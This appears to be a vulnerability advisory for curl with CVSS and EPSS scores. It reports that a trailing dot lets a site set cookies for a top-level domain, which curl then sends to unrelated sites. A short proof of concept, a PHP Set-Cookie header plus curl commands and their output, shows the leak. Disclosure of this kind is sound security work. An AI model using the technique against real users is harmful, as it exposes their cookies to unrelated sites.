5.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
0.005 Low
EPSS
Percentile
74.8%
In CVE-2014-3620 curl prevents cookies from being set for Top Level Domains (TLDs). According to the advisory, curl’s “cookie parser has no Public Suffix awareness”, but it will “reject TLDs from being allowed”. However, a cookie can still be set for a TLD + trailing dot.
A trailing dot after a TLD is considered legal and curl will send the http://example.com. to http://example.com
<?php
header("Set-Cookie: a=b; Domain=.me.");
curl -c cookies.txt http://localtest.me./index.php
cookies.txt:
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
.me. TRUE / FALSE 0 a b
curl -b cookies.txt http://domain.me./index.php
GET / HTTP/1.1
Host: domain.me.
User-Agent: curl/7.83.0
Accept: */*
Cookie: a=b
Cookies can be set by arbitrary sites for TLD + “.”, and if a trailing dot is used for an unrelated site, curl will send the cookie to the unrelated site.
5.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
0.005 Low
EPSS
Percentile
74.8%